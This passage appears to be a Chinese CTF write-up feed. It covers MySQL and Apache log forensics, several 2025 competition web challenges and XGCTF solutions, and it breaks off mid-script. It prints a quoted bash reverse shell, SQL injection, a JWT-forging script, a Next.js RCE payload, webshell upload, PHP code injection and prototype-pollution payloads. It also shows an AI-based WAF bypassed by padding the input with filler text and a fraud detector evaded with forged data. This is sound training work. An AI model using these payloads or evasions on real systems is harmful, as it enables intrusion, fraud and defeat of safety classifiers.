的报错日志，路径如下：</p> <pre><code>/var/log/mysql/error.log </code></pre> <p>日志中有个脚本</p> <pre><code>/tmp/1.sh: line 1: --2023-08-01: command not found /tmp/1.sh: line 2: Connecting: command not found /tmp/1.sh: line 3: HTTP: command not found /tmp/1.sh: line 4: Length:: command not found /tmp/1.sh: line 5: Saving: command not found /tmp/1.sh: line 7: 0K: command not found /tmp/1.sh: line 9: syntax error near unexpected token `(' /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]' </code></pre> <p>查看1.sh，反弹shell的命令</p> <pre><code>bash -i &gt;&amp;/dev/tcp/192.168.100.13/777 0&gt;&amp;1 flag{192.168.100.13} </code></pre> <h2>3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx</h2> <h3>寻找提权文件</h3> <p>Mysql的提权方式有四种</p> <ul> <li>UDF 提权</li> <li>MOF 提权</li> <li>启动项提权</li> <li>CVE-2016-6663</li> </ul> <p>基于目前的环境我们可以排除 MOF 提权（Windows 下可利用），启动项提权（Windows 下可利用），而 CVE-2016-6663 需要 MariaDB &lt;= 5.5.51 或 10.0.x &lt;= 10.0.27 或 10.1.x &lt;= 10.1.17，而我们环境的 MariaDB 版本为 5.5.64，不在此漏洞的影响版本内，也可以排除掉</p> <p>所以目前只剩 UDF 提权一种方法，我们只需排查这个提权方式即可，UDF 提权是基于自定义函数实现的，而自定义函数的前提是 UDF 的动态链接库文件放置于 MySQL 安装目录下的lib\plugin文件夹，故我们需要登录 Mysql 对 plugin 关键字进行排查</p> <p>一般来说，在/etc/mysql/my.cnf会保存 Mysql 的登录密码，但是本关在这里并没有找到密码</p> <p>在网站目录下存在一个common.php，里面有mysql的账密</p> <pre><code>/var/www/html/common.php </code></pre> <p>登录</p> <pre><code>mysql -uroot -p334cc35b3c704593 </code></pre> <p>之后对 plugin 关键词进行排查，显示所有与 plugin 相关的系统变量</p> <pre><code>show variables like '%plugin%' </code></pre> <p>发现一个有效变量为plugin_dir，value值就是其路径</p> <pre><code>/usr/lib/mysql/plugin/udf.so flag{b1818bde4e310f3d23f1005185b973e7} </code></pre> <p>这里总结一下,UDF提权使用的文件是<code>/usr/lib/Mysql/plugin/udf.so</code></p> <h2>4.黑客获取的权限 flag{whoami后的值}</h2> <p>第五章</p> <p>使用ps -aux命令查看进程的详细信息，可以看到提权文件的运行后的权限为mysql，故 Flag 为 mysql</p> <p>法二:udf提权</p> <pre><code>mysql -uroot -p334cc35b3c704593 select * from mysql.func; select sys_eval("whoami"); </code></pre> <h1>第一章 日志分析-Apache 日志分析</h1> <pre><code>1、提交当天访问次数最多的IP，即黑客IP： 2、黑客使用的浏览器指纹是什么，提交指纹的md5： 3、查看包含index.php页面被访问的次数，提交次数： 4、查看黑客IP访问了多少次，提交次数： 5、查看2023年8月03日8时这一个小时内有多少IP访问，提交次数: </code></pre> <h2>1、提交当天访问次数最多的IP，即黑客IP：</h2> <p>登录靶机，我们的目的是分析 Apache 的日志，Apache+Linux 日志路径一般是以下三种：</p> <ul> <li>/var/log/apache/access.log</li> <li>/var/log/apache2/access.log</li> <li>/var/log/httpd/access.log</li> </ul> <p>看第一位的ip</p> <pre><code>cat access.log.1 | awk '{print $1}' | sort | uniq -c flag{192.168.200.2} </code></pre> <h2>2、黑客使用的浏览器指纹是什么，提交指纹的md5：</h2> <p>指纹就是UA头</p> <pre><code>cat access.log.1 | grep -Ea "192.168.200.2"| sort | uniq -c </code></pre> <pre><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 flag{2d6330f380f44ac20f3a02eed0958f66} </code></pre> <h2>3、查看包含index.php页面被访问的次数，提交次数：</h2> <p>计数已经计算不出来了，这里我们计算行数</p> <pre><code>cat access.log.1 | grep -Ea "/index.php"| sort | wc -l flag{27} </code></pre> <h2>4、查看黑客IP访问了多少次，提交次数：</h2> <p>这里要注意"192.168.200.2 - -若"192.168.200.2"则会把2xx后面的ip计入数据</p> <pre><code>cat access.log.1 | grep -Ea "192.168.200.2 - -"| wc -l flag{6555} </code></pre> <h2>5、查看2023年8月03日8时这一个小时内有多少IP访问，提交次数:</h2> <pre><code>cat access.log.1 | grep -Ea "^[0-9]+.*+03/Aug/2023:(08|09)"|awk '{print $1}'| uniq -c | wc -l flag{5} </code></pre> https://origin618.github.io/posts/2025-%E9%95%BF%E5%9F%8E%E6%9D%AF-web/https://origin618.github.io/posts/2025-%E9%95%BF%E5%9F%8E%E6%9D%AF-web/2025-长城杯-webWed, 31 Dec 2025 00:00:00 GMT<h1>WEB</h1> <h2>AI_WAF</h2> <p>开局一个搜索框，我们随便提交一下信息捉包</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228182953936-1766929152577-1.png" alt="image-20251228182953936" /></p> <p>有个query:</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228183029453-1766929152578-4.png" alt="image-20251228183029453" /></p> <p>尝试单引号闭合，发现这里有注入</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228183104490-1766929152578-2.png" alt="image-20251228183104490" /></p> <p>尝试注入，发现有ai判断</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228183232613-1766929152578-15.png" alt="image-20251228183232613" /></p> <p>我们这里尝试输入无意义长文段干扰ai判断，使得confidence下降值我们能够注入</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228183657837-1766929152578-3.png" alt="image-20251228183657837" /></p> <p>成功绕过</p> <p>下面就是常规sql注入</p> <pre><code>-1'union select 1,database(),3 -- </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251228183859895-1766929152578-26.png" alt="image-20251228183859895" /></p> <p>得到nexadata</p> <pre><code>-1'union select 1,group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema = 'nexadata' -- </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251228184001195-1766929152578-10.png" alt="image-20251228184001195" /></p> <p>得到article,where_is_my_flagggggg</p> <pre><code>-1'union select 1,group_concat(column_name), 3 FROM information_schema.columns WHERE table_name = 'where_is_my_flagggggg' </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251228184037540-1766929152578-5.png" alt="image-20251228184037540" /></p> <p>得到Th15_ls_f149</p> <pre><code>-1'union select 1,group_concat(Th15_ls_f149), 3 FROM where_is_my_flagggggg </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251228184102353-1766929152578-6.png" alt="image-20251228184102353" /></p> <p>flag{f5312cd1-722b-4966-bfb8-9a8cbb400a40}</p> <h2>Deprecated</h2> <p>https://asal1n.github.io/2025/05/04/2025%20CCB%20final/index.html</p> <p>这里是去年长城杯final原题</p> <p>我们注册两个账号，分别取出其session</p> <p>eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyIiwicHJpdmlsZWRnZSI6IlRlbXAgVXNlciIsImlhdCI6MTc2NjkxODcxM30.smlS5ce8-nub0S-eDJZZO_cxbIzV0UBKGCH0gHkXjNiBVBGE69ddt2J8ZXQWButMllKvKXc8z-G2RAz-IUr_dguWMsr21mZY-p0xkutVxo3w5BIvMInMDDzeE3nJpK6jkF84etm4DtiwqqYVAtIghVfVktzcbIQjJVEEM1wwPZU</p> <p>eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMyIsInByaXZpbGVkZ2UiOiJUZW1wIFVzZXIiLCJpYXQiOjE3NjY5MTg3MzF9.aMrfucnb7VlcwIeFfXIZaxe22HyIOZQkBDSsRxAKxdSR84gbsCL4n3N1DGUTWPDYLiQO-qFbkSh7dF37lUilCYuv647_g1y2l9YM6VsqYL6y8qT6_Ea53VcnLM_slGlae7TEUwfhSsstUMSqLZkYC1qx-aVjGJvQ53qqpLs-MQ8</p> <p><a href="https://github.com/silentsignal/rsa_sign2n/tree/release">silentsignal/rsa_sign2n: Deriving RSA public keys from message-signature pairs</a></p> <p>我们从这里下载脚本，通过脚本解密</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228184804954-1766929152578-7.png" alt="image-20251228184804954" /></p> <p>生成了两个文件</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228185710232-1766929152578-8.png" alt="image-20251228185710232" /></p> <p>这里我们用e39595edbb089f70_65537_x509.pem</p> <pre><code>const jwt = require('jsonwebtoken'); const fs = require('fs'); const publicKey = fs.readFileSync('./e39595edbb089f70_65537_x509.pem', 'utf8'); data={ username: "admin", priviledge:'File-Priviledged-User' } data = Object.assign(data); console.log( jwt.sign(data, publicKey, { algorithm:'HS256'})) </code></pre> <p>得到新的session</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228185804613-1766929152578-13.png" alt="image-20251228185804613" /></p> <p>我们hackbar将老session替换</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228185846070-1766929152578-9.png" alt="image-20251228185846070" /></p> <p>成为admin用户</p> <p>然后我们捉包，将大佬文章里的exp直接打</p> <pre><code>GET /checkfile?file[]=&amp;file[]=&amp;file[]=&amp;file[]=&amp;file[]=&amp;file[]=&amp;file[]=&amp;file[]=&amp;file[]=&amp;file[]=../../../../../../../../flag.txt&amp;file[]=.&amp;file[]=log&amp; HTTP/2 Host: eci-2ze524ik705ih2la1l9i.cloudeci1.ichunqiu.com:8080 Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1766199268; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicHJpdmlsZWRnZSI6IkZpbGUtUHJpdmlsZWRnZWQtVXNlciIsImlhdCI6MTc2NjkxOTEzN30.DpNIf5ZS2gI-7ASL-_Q4lAKT_fkzUr-wGStE6uhbUSM Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Priority: u=0, i </code></pre> <p>得到flag</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228185327828-1766929152578-11.png" alt="image-20251228185327828" /></p> <p>flag{b7685b18-397c-4138-ae78-660370596d18}</p> <h2>hellogate</h2> <p>开局一张图片</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228190040255-1766929152578-12.png" alt="image-20251228190040255" /></p> <p>Ctrl+u查看源代码未果，我们直接访问</p> <pre><code>view-source:https://eci-2zea4i7m0byk99nsece3.cloudeci1.ichunqiu.com:80/ </code></pre> <p>拉到尾部发现是一道php反序列化</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228190154115-1766929152578-17.png" alt="image-20251228190154115" /></p> <pre><code>&lt;?php error_reporting(0); class A { public $handle; public function triggerMethod() { echo "" . $this-&gt;handle; } } class B { public $worker; public $cmd; public function __toString() { return $this-&gt;worker-&gt;result; } } class C { public $cmd; public function __get($name) { echo file_get_contents($this-&gt;cmd); } } $raw = isset($_POST['data']) ? $_POST['data'] : ''; header('Content-Type: image/jpeg'); readfile("muzujijiji.jpg"); highlight_file(__FILE__); $obj = unserialize($_POST['data']); $obj-&gt;triggerMethod(); </code></pre> <p>这条pop链子终点是<code>Class C</code> 中的 <code>__get()</code> 方法。它调用了 <code>file_get_contents($this-&gt;cmd)</code>，可以读取服务器上的文件</p> <p>我们通过“当访问一个对象的不存在或不可访问的属性时自动调用，传递属性名作为参数”触发__get，于是我们将 <code>$worker</code> 设为 <code>Class C</code> 的对象，且 <code>C</code> 没有 <code>result</code> 属性</p> <p>当对象被当作字符串处理时，会触发 <code>__toString</code>，我们通过 <code>Class A</code> <code>triggerMethod()</code> 得<code>echo "" . $this-&gt;handle;</code>，触发<code>__toString</code></p> <pre><code>&lt;?php class A { public $handle; } class B { public $worker; } class C { public $cmd; } $c = new C(); $c-&gt;cmd = "/flag"; $b = new B(); $b-&gt;worker = $c; $a = new A(); $a-&gt;handle = $b; echo urlencode(serialize($a)); ?&gt; </code></pre> <p>我们运行得到</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228191324826-1766929152578-14.png" alt="image-20251228191324826" /></p> <pre><code>data=O%3A1%3A%22A%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A6%3A%22worker%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7D </code></pre> <p>将请求方法改为post后，post传参data</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228190410770-1766929152578-18.png" alt="image-20251228190410770" /></p> <p>得到flag</p> <p>flag{6590a341-0fd9-44ac-87f2-0dd03bf3279c}</p> <h2>redjs</h2> <p>这题是最近比较热门得next.js的cve漏洞，CVE-2025-55182</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228191701070-1766929152578-16.png" alt="image-20251228191701070" /></p> <p>我们用exp直接攻击</p> <pre><code>POST / HTTP/1.1 Host: eci-2ze62hcjqxqbhpvn23as.cloudeci1.ichunqiu.com:3000 Next-Action: x X-Nextjs-Request-Id: ygdkgols Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad X-Nextjs-Html-Request-Id: 0OySzliul7lMdEUPchXuS Content-Length: 751 ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="0" { "then":"$1:__proto__:then", "status":"resolved_model", "reason":-1, "value":"{\"then\":\"$B133\"}", "_response":{ "_prefix":"var res=process.mainModule.require('child_process').execSync('cat /f*').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks":"$Q2", "_formData":{ "get":"$1:constructor:constructor" } } } ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="1" "$@0" ------WebKitFormBoundaryx8jO2oVc6SWP3Sad Content-Disposition: form-data; name="2" [] ------WebKitFormBoundaryx8jO2oVc6SWP3Sad-- </code></pre> <p>得到flag</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228191738960-1766929152578-31.png" alt="image-20251228191738960" /></p> <p>flag{d8f31aae-124e-4427-9560-92093163f31f}</p> <h2>dedecms</h2> <p>dede框架之前在湾区杯决赛中见过，在/dede/login.php尝试弱口令admin/admin admin/123456后无果，遂注册账号登录</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192034592-1766929152578-19.png" alt="image-20251228192034592" /></p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192045365-1766929152578-21.png" alt="image-20251228192045365" /></p> <p>进入会员中心查找功能点，发现基本都是这个</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192245837-1766929152578-20.png" alt="image-20251228192245837" /></p> <p>用自己邮箱注册发现也没收到邮件</p> <p>偶然间看到新朋友那里有一个账号Aa123456789</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192045365-1766921019950-1-1766929152578-22.png" alt="image-20251228192045365" /></p> <p>我们在/dede/login.php尝试弱口令登录Aa123456789/Aa123456789</p> <p>成功进入</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192510126-1766929152578-23.png" alt="image-20251228192510126" /></p> <p>继续找功能点，其中在专题管理那里有一个添加专题</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192546792-1766929152578-24.png" alt="image-20251228192546792" /></p> <p>这里有一个缩略图，我们传入图片木马吗捉包尝试</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192643671-1766929152578-25.png" alt="image-20251228192643671" /></p> <p>这里我们直接将filename改为1.php上传</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192701914-1766929152578-27.png" alt="image-20251228192701914" /></p> <p>上传成功</p> <p>我们蚁剑添加，在相应的路径/uploads/allimg/251228/2-25122Q92A30-L.php连接，密码为shell</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192749927-1766929152578-28.png" alt="image-20251228192749927" /></p> <p>成功</p> <p>在根目录那里直接找到flag.txt</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228192835122-1766929152578-29.png" alt="image-20251228192835122" /></p> <p>flag{c62ec31c-a807-428a-9a00-72807c998405}</p> <h1>AI安全</h1> <h2>The Silent Heist</h2> <p>题目提供了一份 <code>public_ledger.csv</code>，包含 1000 条被标记为“正常”的交易记录。每条记录有 20 个特征（<code>feat_0</code> 到 <code>feat_19</code>），其中 <code>feat_0</code> 是交易金额。</p> <p>服务端通过 <code>nc 112.125.125.30 30833</code> 交互，要求我们上传 CSV 格式的伪造数据。</p> <p><strong>限制条件</strong>:</p> <ol> <li><strong>Isolation Forest 检测</strong>: 提交的数据必须符合“正常”用户的行为模式。</li> <li><strong>黑名单检测</strong>: 不能直接发送 <code>public_ledger.csv</code> 中的原始数据。</li> <li><strong>去重检测</strong>: 不能大量发送重复的同一条数据。</li> </ol> <p>最初尝试计算这 1000 条数据的均值（Mean）和协方差矩阵（Covariance Matrix），然后利用多元高斯分布（Multivariate Normal Distribution）生成新数据。 然而，提交后被系统识别为“异常”。</p> <p>后面发现，既然我们已经有了 1000 个确定的“安全点”（正常样本），最稳妥的策略是在这些安全点附近进行“微调”。</p> <p><strong>算法步骤</strong>:</p> <ol> <li><strong>重采样 (Resampling)</strong>: 从原始的 1000 条数据中随机抽取样本。</li> <li><strong>添加噪声 (Noise Injection)</strong>: 对抽取的样本添加极小的随机高斯噪声。 <ul> <li>噪声的大小设定为各特征标准差的 <strong>1%</strong> (<code>noise_scale = 0.01</code>)。</li> <li>这样可以保证生成的点在 20 维空间中依然紧紧围绕在原始“安全点”周围，处于 Isolation Forest 的高密度区域（即“正常”区域）。</li> <li>同时，由于引入了随机性，生成的每一个点在数值上都是唯一的，从而绕过了服务端的<strong>黑名单</strong>（精确匹配原始数据）和<strong>去重</strong>（精确匹配重复数据）检测。</li> </ul> </li> <li><strong>累加</strong>: 循环生成直到总金额（<code>feat_0</code> 的累加和）超过 $2,000,000。</li> </ol> <pre><code>import numpy as np import socket import io import sys def solve(): # 1. 加载正常数据 data = np.genfromtxt('public_ledger.csv', delimiter=',', skip_header=1) # 2. 计算每一列的特征标准差，用于生成合适的噪声 stds = np.std(data, axis=0) target_amount = 2000000 current_amount = 0 generated_data = [] # 关键参数：噪声比例设为 1% noise_scale = 0.01 print(f"Generating data with noise scale {noise_scale}...") while current_amount &lt; target_amount: # 3. 随机抽取原始样本 indices = np.random.choice(len(data), 1000, replace=True) base_samples = data[indices] # 4. 加上微小的高斯噪声 noise = np.random.normal(0, stds * noise_scale, base_samples.shape) new_samples = base_samples + noise # 确保金额非负 new_samples[:, 0] = np.abs(new_samples[:, 0]) generated_data.append(new_samples) current_amount += np.sum(new_samples[:, 0]) final_data = np.vstack(generated_data) # 截取数据，刚好超过目标金额即可 cum_sum = np.cumsum(final_data[:, 0]) cutoff_idx = np.searchsorted(cum_sum, target_amount) + 1 final_data = final_data[:cutoff_idx] print(f"Final dataset: {len(final_data)} samples, Amount: {np.sum(final_data[:, 0]):.2f}") # 格式化 CSV 输出 header = "f0,f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,f13,f14,f15,f16,f17,f18,f19" output = io.StringIO() output.write(header + "\n") np.savetxt(output, final_data, delimiter=",", fmt="%.16f") csv_content = output.getvalue() # 发送到服务器 HOST = '60.205.252.190' PORT = 36881 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((HOST, PORT)) # ... (发送逻辑省略) ... </code></pre> <p>运行脚本后，成功伪造了约 5700 条交易记录，总金额达到 201 万美元，且未触发异常警报。</p> <p><img src="./../../../public/pcb5-ez_java/image-20251228195836259-1766929152578-30.png" alt="image-20251228195836259" /></p> <p><strong>Flag</strong>: <code>flag{afc64582-32f0-48a8-9193-7a3ddece960e}</code></p> https://origin618.github.io/posts/xgctf_%E8%A5%BF%E7%93%9C%E6%9D%AF/https://origin618.github.io/posts/xgctf_%E8%A5%BF%E7%93%9C%E6%9D%AF/XGCTF_西瓜杯Thu, 25 Dec 2025 00:00:00 GMT<h1>XGCTF_西瓜杯</h1> <p>西瓜杯难度还是有点难度的，来我们做题</p> <h2>CodeInject</h2> <p>查看代码</p> <pre><code>&lt;?php #Author: h1xa error_reporting(0); show_source(__FILE__); eval("var_dump((Object)$_POST[1]);"); </code></pre> <p>这里将获取到的数据强制转换为对象类型并且输出这个对象的详细信息</p> <p>下面提供三种方法</p> <p>直接拼接执行</p> <pre><code>1=system("cat /*f*") </code></pre> <p>利用 PHP 的反引号 var_dump之前执行命令</p> <pre><code>1=`system("cat /*f*")` </code></pre> <p>闭合括号</p> <pre><code>1=1);system("cat /*f*");// </code></pre> <p>利用 ${} 复杂变量解析</p> <pre><code>1=${system("cat /*f*")} </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251224082606187-1766539447481-1-1766670360263-8.png" alt="image-20251224082606187" /></p> <p>ctfshow{d359ed49-0a66-4b98-b967-9b86a6bd3afe}</p> <h2>tpdoor</h2> <pre><code>&lt;?php namespace app\controller; use app\BaseController; use think\facade\Db; class Index extends BaseController { protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit']; public function index($isCache = false , $cacheTime = 3600) { if($isCache == true){ $config = require __DIR__.'/../../config/route.php'; $config['request_cache_key'] = $isCache; $config['request_cache_expire'] = intval($cacheTime); $config['request_cache_except'] = []; file_put_contents(__DIR__.'/../../config/route.php', '&lt;?php return '. var_export($config, true). ';'); return 'cache is enabled'; }else{ return 'Welcome ,cache is disabled'; } } } </code></pre> <p>查看index.php，其中$middleware有很多中间件，我们先报错查看框架版本</p> <p>ThinkPHP 默认通过 <code>s</code> 参数来获取 <code>PATH_INFO</code>，我们可以通过这个报错</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224095256008-1766670360263-1.png" alt="image-20251224095256008" /></p> <p>下载源码我们挨个查看中间键，其中</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224095437456-1766670360263-2.png" alt="image-20251224095437456" /></p> <p>这里进行过滤，我们跟进$fun</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224095536173-1766670360263-4.png" alt="image-20251224095536173" /></p> <p>若$key存在|，则分隔成两个参数，前面是参数值后面是执行函数</p> <p>其中参数从isCache得来</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224095649722-1766670360263-3.png" alt="image-20251224095649722" /></p> <pre><code>https://a547fd9c-35b9-410e-8ac3-0b2d66a83bc4.challenge.ctf.show/?isCache=ls /|system </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251224095859292-1766670360263-6.png" alt="image-20251224095859292" /></p> <p>成功执行</p> <p>因为是缓存，只能执行一次，我们重新开个容器执行命令</p> <pre><code>https://a547fd9c-35b9-410e-8ac3-0b2d66a83bc4.challenge.ctf.show/?isCache=nl /0*|system </code></pre> <p>得到flag</p> <p><img alt="image-20251224085722886" /></p> <p>ctfshow{2622dece-3338-48d6-bc10-90720859da3e}</p> <h2>easy_polluted</h2> <pre><code>from flask import Flask, session, redirect, url_for,request,render_template import os import hashlib import json import re def generate_random_md5(): random_string = os.urandom(16) md5_hash = hashlib.md5(random_string) return md5_hash.hexdigest() def filter(user_input): blacklisted_patterns = ['init', 'global', 'env', 'app', '_', 'string'] for pattern in blacklisted_patterns: if re.search(pattern, user_input, re.IGNORECASE): return True return False def merge(src, dst): # Recursive merge function for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) app = Flask(__name__) app.secret_key = generate_random_md5() class evil(): def __init__(self): pass @app.route('/',methods=['POST']) def index(): username = request.form.get('username') password = request.form.get('password') session["username"] = username session["password"] = password Evil = evil() if request.data: if filter(str(request.data)): return "NO POLLUTED!!!YOU NEED TO GO HOME TO SLEEP~" else: merge(json.loads(request.data), Evil) return "MYBE YOU SHOULD GO /ADMIN TO SEE WHAT HAPPENED" return render_template("index.html") @app.route('/admin',methods=['POST', 'GET']) def templates(): username = session.get("username", None) password = session.get("password", None) if username and password: if username == "adminer" and password == app.secret_key: try: flag_content = open("flag", "rt").read() except: try: flag_content = open("../flag", "rt").read() except: flag_content = "FLAG{test_flag_locally}" return render_template("flag.html", flag=flag_content) else: return "Unauthorized" else: return f'Hello, This is the POLLUTED page.' if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) </code></pre> <p>我们先污染KEY，再污染模版渲染符</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224105628300-1766670360263-9.png" alt="image-20251224105628300" /></p> <pre><code>payload={ "__init__":{ "__globals__":{ "app":{ "secret_key":"123", "jinja_env":{ "variable_start_string":"[#", "variable_end_string":"#]" } } } } } </code></pre> <p>这里过滤了blacklisted_patterns = ['init', 'global', 'env', 'app', '_', 'string']，我们用用Unicode绕过即可</p> <pre><code>{ "\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f": { "\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f": { "\u0061\u0070\u0070": { "secret\u005fkey": "123", "jinja\u005f\u0065\u006e\u0076": { "\u0076\u0061\u0072\u0069\u0061\u0062\u006c\u0065\u005f\u0073\u0074\u0061\u0072\u0074\u005f\u0073\u0074\u0072\u0069\u006e\u0067": "[#", "\u0076\u0061\u0072\u0069\u0061\u0062\u006c\u0065\u005f\u0065\u006e\u0064\u005f\u0073\u0074\u0072\u0069\u006e\u0067": "#]" } } } } } </code></pre> <p>继续传入usernmae=adminer&amp;password=mine，改变session值</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224110322047-1766670360263-5.png" alt="image-20251224110322047" /></p> <pre><code>session=eyJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiYWRtaW5lciJ9.aUtYTw.FbFl0Bkt5rhynLd8xmQeVbJUGzU </code></pre> <p>访问/admin</p> <p><img src="./../../../public/pcb5-ez_java/image-20251224110404978-1766670360263-7.png" alt="image-20251224110404978" /></p> <p>ctfshow{e398f402-c11d-4468-9e66-9995d1e423e5}</p> <p>这里有个非预期，因为使用了<code>json.loads</code></p> <pre><code>poc={ "__init__" : { "__globals__" :{ "app" :{ "_static_folder":"/"} } } } </code></pre> <pre><code>{ "\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f" : { "\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f" :{ "\u0061\u0070\u0070" :{ "\u005f\u0073\u0074\u0061\u0074\u0069\u0063\u005f\u0066\u006f\u006c\u0064\u0065\u0072":"/"} } } } </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251224110929245-1766670360263-10.png" alt="image-20251224110929245" /></p> <p>ctfshow{e398f402-c11d-4468-9e66-9995d1e423e5}</p> <p>出题人脚本</p> <pre><code>import requests import json def poc_1(session, url): headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type": "application/json", "Host": "fb6a5b21-7b61-461a-8dbd-35997bd62c82.challenge.ctf.show" } res = session.post(url=url, headers=headers, data=json.dumps({ r"\u005F\u005F\u0069nit\u005F\u005F": { r"\u005F\u005F\u0067lobals\u005F\u005F": { r"\u0061pp": { "config": { r"SECRET\u005FKEY": "Dragonkeep" } } } } }), verify=False) return res.text def poc_2(session, url): headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type": "application/json", "Host": "fb6a5b21-7b61-461a-8dbd-35997bd62c82.challenge.ctf.show" } res = session.post(url=url, headers=headers, data=json.dumps({ r"\u005F\u005F\u0069nit\u005F\u005F": { r"\u005F\u005F\u0067lobals\u005F\u005F": { r"\u0061pp": { r"jinja\u005F\u0065nv": { r"variable\u005Fstart\u005F\u0073tring": "[#", r"variable\u005Fend\u005F\u0073tring": "#]" } } } } }), verify=False) return res.text def poc_admin(session, url): url = url + "/admin" headers = { "Host": "fb6a5b21-7b61-461a-8dbd-35997bd62c82.challenge.ctf.show", 'Cookie': 'session=eyJwYXNzd29yZCI6IkRyYWdvbmtlZXAiLCJ1c2VybmFtZSI6ImFkbWluZXIifQ.ZoPoJw.XozJYtjOp2mah8LEEoPZZzdIjzc' } res = session.post(url=url, headers=headers, data=json.dumps({ r"\u005F\u005F\u0069nit\u005F\u005F": { r"\u005F\u005F\u0067lobals\u005F\u005F": { r"\u0061pp": { r"jinja\u005F\u0065nv": { r"variable\u005Fstart\u005F\u0073tring": "[#", r"variable\u005Fend\u005F\u0073tring": "#]" } } } } }), verify=False) return res if __name__ == '__main__': url = "http://fb6a5b21-7b61-461a-8dbd-35997bd62c82.challenge.ctf.show/" session = requests.Session() result1 = poc_1(session, url) print(result1) result2 = poc_2(session, url) print(result2) flag = poc_admin(session, url) print(flag.text) </code></pre> <p>自己编脚本</p> <pre><code>import requests import json import 